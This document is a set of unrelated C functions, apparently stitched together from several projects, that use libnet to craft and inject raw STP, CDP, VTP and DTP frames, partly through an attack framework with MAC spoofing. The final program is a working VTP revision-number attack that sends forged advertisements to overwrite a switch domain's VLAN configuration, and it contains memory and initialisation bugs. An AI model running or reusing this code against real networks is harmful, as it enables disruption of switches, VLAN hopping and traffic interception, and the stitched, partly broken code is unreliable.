int main(int argc, char *argv[]) { int c, len, type; libnet_t *l; libnet_ptag_t t; u_char *dst, *src; u_char rootid[8], bridgeid[8]; char *device = NULL; char errbuf[LIBNET_ERRBUF_SIZE]; printf("libnet 1.1 packet shaping: [STP]\n"); device = NULL; src = dst = NULL; type = CONF; while ((c = getopt(argc, argv, "cd:i:s:t")) != EOF) { switch (c) { case 'c': type = CONF; break; case 'd': dst = libnet_hex_aton(optarg, &len); break; case 'i': device = optarg; break; case 's': src = libnet_hex_aton(optarg, &len); break; case 't': type = TCN; break; default: usage(argv[0]); exit(EXIT_FAILURE); } } if (src == NULL || dst == NULL) { usage(argv[0]); exit(EXIT_FAILURE); } /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_LINK, /* injection type */ device, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } if (type == CONF) { rootid[0] = 0x80; rootid[1] = 0x00; rootid[2] = 0x00; rootid[3] = 0x07; rootid[4] = 0xec; rootid[5] = 0xae; rootid[6] = 0x30; rootid[7] = 0x41; bridgeid[0] = 0x80; bridgeid[1] = 0x00; bridgeid[2] = 0x00; bridgeid[3] = 0x07; bridgeid[4] = 0xec; bridgeid[5] = 0xae; bridgeid[6] = 0x30; bridgeid[7] = 0x41; t = libnet_build_stp_conf( 0x0000, /* protocol id */ 0x00, /* protocol version */ 0x00, /* BPDU type */ 0x00, /* BPDU flags */ rootid, /* root id */ 0x00000001, /* root path cost */ bridgeid, /* bridge id */ 0x8002, /* port id */ 0x00, /* message age */ 0x0014, /* max age */ 0x0002, /* hello time */ 0x000f, /* forward delay */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build STP conf header: %s\n", libnet_geterror(l)); goto bad; } } else { t = libnet_build_stp_tcn( 0x0000, /* protocol id */ 0x00, /* protocol version */ 0x80, /* BPDU type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build STP tcn header: %s\n", libnet_geterror(l)); goto bad; } } t = libnet_build_802_2( LIBNET_SAP_STP, /* DSAP */ LIBNET_SAP_STP, /* SSAP */ 0x03, /* control */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_802_3( dst, /* ethernet destination */ src, /* ethernet source */ LIBNET_802_2_H + ((type == CONF) ? LIBNET_STP_CONF_H : LIBNET_STP_TCN_H), /* frame size */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte STP packet; check the wire.\n", c); } free(dst); free(src); libnet_destroy(l); return (EXIT_SUCCESS); bad: free(dst); free(src); libnet_destroy(l); return (EXIT_FAILURE); }
int8_t vtp_send(struct attacks *attacks) { libnet_ptag_t t; libnet_t *lhandler; u_int32_t vtp_len=0, sent; struct vtp_data *vtp_data; struct vtp_summary *vtp_summ; struct vtp_subset *vtp_subset; struct vtp_request *vtp_request; struct vtp_join *vtp_join; u_int8_t *vtp_packet, *aux; u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; dlist_t *p; struct interface_data *iface_data; struct interface_data *iface_data2; vtp_data = attacks->data; switch(vtp_data->code) { case VTP_SUMM_ADVERT: vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary); break; case VTP_SUBSET_ADVERT: vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset)+vtp_data->vlans_len; break; case VTP_REQUEST: vtp_len = sizeof(cisco_data)+38; break; case VTP_JOIN: vtp_len = sizeof(cisco_data)+40+126; break; default: vtp_len = sizeof(cisco_data)+30; break; } vtp_packet = calloc(1,vtp_len); if (vtp_packet == NULL) { thread_error("vtp_send calloc error",errno); return -1; } aux = vtp_packet; memcpy(vtp_packet,cisco_data,sizeof(cisco_data)); aux+=sizeof(cisco_data); switch(vtp_data->code) { case VTP_SUMM_ADVERT: vtp_summ = (struct vtp_summary *)aux; vtp_summ->version = vtp_data->version; vtp_summ->code = vtp_data->code; vtp_summ->followers = vtp_data->followers; if (vtp_data->dom_len > VTP_DOMAIN_SIZE) { vtp_summ->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_summ->domain,vtp_data->domain,VTP_DOMAIN_SIZE); } else { vtp_summ->dom_len = vtp_data->dom_len; memcpy(vtp_summ->domain,vtp_data->domain,vtp_data->dom_len); } vtp_summ->revision = htonl(vtp_data->revision); vtp_summ->updater = htonl(vtp_data->updater); memcpy(vtp_summ->timestamp,vtp_data->timestamp,VTP_TIMESTAMP_SIZE); memcpy(vtp_summ->md5,vtp_data->md5,16); break; case VTP_SUBSET_ADVERT: vtp_subset = (struct vtp_subset *)aux; vtp_subset->version = vtp_data->version; vtp_subset->code = vtp_data->code; vtp_subset->seq = vtp_data->seq; if (vtp_data->dom_len > VTP_DOMAIN_SIZE) { vtp_subset->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_subset->domain,vtp_data->domain,VTP_DOMAIN_SIZE); } else { vtp_subset->dom_len = vtp_data->dom_len; memcpy(vtp_subset->domain,vtp_data->domain,vtp_data->dom_len); } vtp_subset->revision = htonl(vtp_data->revision); if (vtp_data->vlans_len) memcpy((vtp_subset+1),vtp_data->vlan_info,vtp_data->vlans_len); break; case VTP_REQUEST: vtp_request = (struct vtp_request *)aux; vtp_request->version = vtp_data->version; vtp_request->code = vtp_data->code; vtp_request->reserved = 0; if (vtp_data->dom_len > VTP_DOMAIN_SIZE) { vtp_request->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_request->domain,vtp_data->domain,VTP_DOMAIN_SIZE); } else { vtp_request->dom_len = vtp_data->dom_len; memcpy(vtp_request->domain,vtp_data->domain,vtp_data->dom_len); } vtp_request->start_val = htons(vtp_data->start_val); break; case VTP_JOIN: vtp_join = (struct vtp_join *)aux; vtp_join->version = vtp_data->version; vtp_join->code = vtp_data->code; vtp_join->maybe_reserved = 0; if (vtp_data->dom_len > VTP_DOMAIN_SIZE) { vtp_join->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_join->domain,vtp_data->domain,VTP_DOMAIN_SIZE); } else { vtp_join->dom_len = vtp_data->dom_len; memcpy(vtp_join->domain,vtp_data->domain,vtp_data->dom_len); } vtp_join->vlan = htonl(0x000003ef); vtp_join->unknown[0] = 0x40; break; default: aux[0]=vtp_data->version; aux[1]=vtp_data->code; break; } for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) { iface_data = (struct interface_data *) dlist_data(p); lhandler = iface_data->libnet_handler; t = libnet_build_802_2( 0xaa, /* DSAP */ 0xaa, /* SSAP */ 0x03, /* control */ vtp_packet, /* payload */ vtp_len, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ if (t == -1) { thread_libnet_error("Can't build ethernet header",lhandler); libnet_clear_packet(lhandler); free(vtp_packet); return -1; } t = libnet_build_802_3( vtp_data->mac_dest, /* ethernet destination */ (attacks->mac_spoofing) ? vtp_data->mac_source : iface_data->etheraddr, /* ethernet source */ LIBNET_802_2_H + vtp_len, /* frame size */ NULL, /* payload */ 0, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ if (t == -1) { thread_libnet_error("Can't build ethernet header",lhandler); libnet_clear_packet(lhandler); free(vtp_packet); return -1; } /* * Write it to the wire. */ sent = libnet_write(lhandler); if (sent == -1) { thread_libnet_error("libnet_write error", lhandler); libnet_clear_packet(lhandler); free(vtp_packet); return -1; } libnet_clear_packet(lhandler); protocols[PROTO_VTP].packets_out++; iface_data2 = interfaces_get_struct(iface_data->ifname); iface_data2->packets_out[PROTO_VTP]++; } free(vtp_packet); return 0; }
int main(int argc, char *argv[]) { int c, len, index; libnet_t *l; libnet_ptag_t t; u_char *value; u_char values[100]; u_short tmp; char errbuf[LIBNET_ERRBUF_SIZE]; u_int8_t oui[3] = { 0x00, 0x00, 0x0c }; u_int8_t cdp_mac[6] = {0x01, 0x0, 0xc, 0xcc, 0xcc, 0xcc}; if (argc != 3) { fprintf(stderr, "usage %s device device-id\n", argv[0]); return (EXIT_FAILURE); } fprintf(stderr, "cdppoke...\n"); l = libnet_init(LIBNET_LINK, argv[1], errbuf); if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); return (EXIT_FAILURE); } /* build the TLV's by hand until we get something better */ memset(values, 0, sizeof(values)); index = 0; tmp = htons(LIBNET_CDP_VERSION); memcpy(values, &tmp, 2); index += 2; tmp = htons(9); /* length of string below plus type and length fields */ memcpy(values + index, &tmp, 2); index += 2; memcpy(values + index, (u_char *)"1.1.1", 5); index += 5; /* this TLV is handled by the libnet builder */ value = argv[2]; len = strlen(argv[2]); /* build CDP header */ t = libnet_build_cdp( 1, /* version */ 30, /* time to live */ 0x0, /* checksum */ 0x1, /* type */ len, /* length */ value, /* value */ values, /* payload */ index, /* payload size */ l, /* libnet context */ 0); /* libnet ptag */ if (t == -1) { fprintf(stderr, "Can't build CDP header: %s\n", libnet_geterror(l)); goto bad; } /* build 802.2 header */ t = libnet_build_802_2snap( LIBNET_SAP_SNAP, /* SAP SNAP code */ LIBNET_SAP_SNAP, /* SAP SNAP code */ 0x03, /* control */ oui, /* OUI */ 0x2000, /* upper layer protocol type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet context */ 0); /* libnet ptag */ if (t == -1) { fprintf(stderr, "Can't build SNAP header: %s\n", libnet_geterror(l)); goto bad; } /* build 802.3 header */ t = libnet_build_802_3( cdp_mac, /* ethernet destination */ (u_int8_t *)libnet_get_hwaddr(l), /* ethernet source */ LIBNET_802_2_H + LIBNET_802_2SNAP_H + LIBNET_CDP_H, /* packet len */ NULL, /* payload */ 0, /* payload size */ l, /* libnet context */ 0); /* libnet ptag */ if (t == -1) { fprintf(stderr, "Can't build 802.3 header: %s\n", libnet_geterror(l)); goto bad; } /* write the packet out */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte CDP frame \"%s\"\n", c, argv[2]); } libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
int8_t dtp_send(struct attacks *attacks) { libnet_ptag_t t; libnet_t *lhandler; u_int32_t dtp_len, sent; struct dtp_data *dtp_data; u_int8_t *dtp_packet, *aux; u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x04 }; dlist_t *p; struct interface_data *iface_data; struct interface_data *iface_data2; dtp_data = attacks->data; dtp_len = sizeof(cisco_data)+dtp_data->dom_len+26; dtp_packet = calloc(1,dtp_len); if (dtp_packet == NULL) { thread_error("dtp_send calloc error",errno); return -1; } aux = dtp_packet; memcpy(dtp_packet,cisco_data,sizeof(cisco_data)); aux+=sizeof(cisco_data); *aux = dtp_data->version; aux++; aux++; *aux = DTP_TYPE_DOMAIN; aux++; aux++; *aux = dtp_data->dom_len+5; aux++; memcpy(aux,dtp_data->domain,dtp_data->dom_len); aux+=dtp_data->dom_len; aux++; aux++; *aux = DTP_TYPE_STATUS; aux++; aux++; *aux = 0x05; aux++; *aux = dtp_data->status; aux++; aux++; *aux = DTP_TYPE_TYPE; aux++; aux++; *aux = 0x05; aux++; *aux = dtp_data->type; aux++; aux++; *aux = DTP_TYPE_NEIGHBOR; aux++; aux++; *aux = 0x0a; aux++; memcpy(aux,dtp_data->neighbor,ETHER_ADDR_LEN); for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) { iface_data = (struct interface_data *) dlist_data(p); lhandler = iface_data->libnet_handler; t = libnet_build_802_2( 0xaa, /* DSAP */ 0xaa, /* SSAP */ 0x03, /* control */ dtp_packet, /* payload */ dtp_len, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ if (t == -1) { thread_libnet_error("Can't build ethernet header",lhandler); libnet_clear_packet(lhandler); free(dtp_packet); return -1; } t = libnet_build_802_3( dtp_data->mac_dest, /* ethernet destination */ (attacks->mac_spoofing) ? dtp_data->mac_source : iface_data->etheraddr, /* ethernet source */ LIBNET_802_2_H + dtp_len, /* frame size */ NULL, /* payload */ 0, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ if (t == -1) { thread_libnet_error("Can't build ethernet header",lhandler); libnet_clear_packet(lhandler); free(dtp_packet); return -1; } /* * Write it to the wire. */ sent = libnet_write(lhandler); if (sent == -1) { thread_libnet_error("libnet_write error", lhandler); libnet_clear_packet(lhandler); free(dtp_packet); return -1; } libnet_clear_packet(lhandler); protocols[PROTO_DTP].packets_out++; iface_data2 = interfaces_get_struct(iface_data->ifname); iface_data2->packets_out[PROTO_DTP]++; } free(dtp_packet); return 0; }
int main( int argc, char *argv[] ) { int opt,k=0; extern char *optarg; libnet_ptag_t t; libnet_t *lhandler; u_int32_t vtp_len=0, sent; struct vtp_summary *vtp_summ; struct vtp_subset *vtp_sub; u_int8_t *vtp_packet,*vtp_packet2, *aux; u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc }; u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00, 0x00,0x00 }; struct libnet_ether_addr *mymac; char *device; char error_information[LIBNET_ERRBUF_SIZE]; char *domain; // get options while ((opt = getopt(argc, argv, "i:d:")) != -1) { switch (opt) { case 'i': device=malloc(strlen(optarg)); strcpy(device,optarg); k=1; break; case 'd': domain=malloc(strlen(optarg)); strcpy(domain,optarg); break; default: usage(argv[0]); } } if(!k) { printf(" %s -i <interface> -d <vtp domain>\n must assign the interface\n",argv[0]);exit(1);} //init libnet lhandler=libnet_init(LIBNET_LINK,device,error_information); if (!lhandler) { fprintf(stderr, "libnet_init: %s\n", error_information); return -1; } mymac=libnet_get_hwaddr(lhandler); //build the first packet for vtp_summary vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary); vtp_packet = calloc(1,vtp_len); aux = vtp_packet; memcpy(vtp_packet,cisco_data,sizeof(cisco_data)); aux+=sizeof(cisco_data); vtp_summ = (struct vtp_summary *)aux; vtp_summ->version = 0x01; vtp_summ->code = 0x01;//vtp_summary vtp_summ->followers = 0x01; vtp_summ->dom_len = strlen(domain); memcpy(vtp_summ->domain,domain,strlen(domain)); vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok t = libnet_build_802_2( 0xaa, /* DSAP */ 0xaa, /* SSAP */ 0x03, /* control */ vtp_packet, /* payload */ vtp_len, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ t = libnet_build_802_3( dst_mac, /* ethernet destination */ mymac->ether_addr_octet, /* ethernet source */ LIBNET_802_2_H + vtp_len, /* frame size */ NULL, /* payload */ 0, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ sent = libnet_write(lhandler); if (sent == -1) { libnet_clear_packet(lhandler); free(vtp_packet); return -1; } libnet_clear_packet(lhandler); //build the second vtp packet for vtp_subset vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset); vtp_packet2 = calloc(1,vtp_len); aux = vtp_packet2; memcpy(vtp_packet2,cisco_data,sizeof(cisco_data)); aux+=sizeof(cisco_data); vtp_sub = (struct vtp_subset *)aux; vtp_sub->version = 0x01; vtp_sub->code = 0x02; //vtp_subset vtp_sub->seq = 0x01; vtp_sub->dom_len = strlen(domain); memcpy(vtp_sub->domain,domain,strlen(domain)); vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok // memcpy(vtp_sub->aaa,aaa,strlen(aaa)); t = libnet_build_802_2( 0xaa, /* DSAP */ 0xaa, /* SSAP */ 0x03, /* control */ vtp_packet2, /* payload */ vtp_len, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ t = libnet_build_802_3( dst_mac, /* ethernet destination */ mymac->ether_addr_octet, /* ethernet source */ LIBNET_802_2_H + vtp_len, /* frame size */ NULL, /* payload */ 0, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ sent = libnet_write(lhandler); if (sent == -1) { libnet_clear_packet(lhandler); free(vtp_packet); return -1; } libnet_clear_packet(lhandler); }